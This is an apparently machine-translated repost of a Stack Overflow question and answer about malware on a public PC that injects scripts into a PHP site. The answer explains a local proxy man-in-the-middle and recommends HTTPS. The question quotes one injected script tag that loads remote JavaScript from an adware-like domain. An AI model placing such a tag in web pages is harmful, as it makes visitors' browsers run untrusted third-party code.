gpt4 book ai didi

javascript - 如何将随机脚本注入(inject)到我的 Web 应用程序中?

转载 作者:行者123 更新时间:2023-12-03 06:54:30 24 4
gpt4 key购买 nike

我使用的公共(public)电脑似乎感染了某些恶意软件,这些恶意软件正在破坏我的网站。其他电脑工作正常,所以我相信这是这台特定的电脑,而不是我的 godaddy 服务器。下面是随机脚本之一。

<script src="http://i.pricejs.info/pfna/javascript.js?channel=pfnana2014&amp;hid=v5532D312D352D32312D313433383236313438312D16B3533E63&amp;instgrp=20151129__1263__lnk_auto_1218_1&amp;trinity=Z12u7t2g6b0u&amp;sset=7" type="text/javascript"></script>

这是怎么发生的?我可以采取什么措施来防止这种情况发生?

也许我可以阻止 DOM 注入(inject)?浏览器是如何被感染的吗?

服务器上的 PHP/mySQL。

最佳答案

How is this happening

该 PC 内的恶意软件可能正在运行代理服务器,该服务器通过它隧道传输您的网络通信并向您的页面注入(inject)标记。如果我没记错的话,这是一种中间人 (MITM) 攻击。

is there anything I can do to prevent this?

没有。这是客户端机器的问题。您可以通过 HTTPS 为您的网站提供服务。通信中的任何中断(例如中间的代理)都会破坏端到端安全性,并导致浏览器显示不安全站点的警告。

Perhaps I can block DOM injection some how?

你可能不能。在沙盒环境(例如网页)与恶意软件运行的特权环境中,您无能为力。

Is the browser infected some how?

可能不仅仅是浏览器,还有机器本身。

关于javascript - 如何将随机脚本注入(inject)到我的 Web 应用程序中?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/37336865/

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com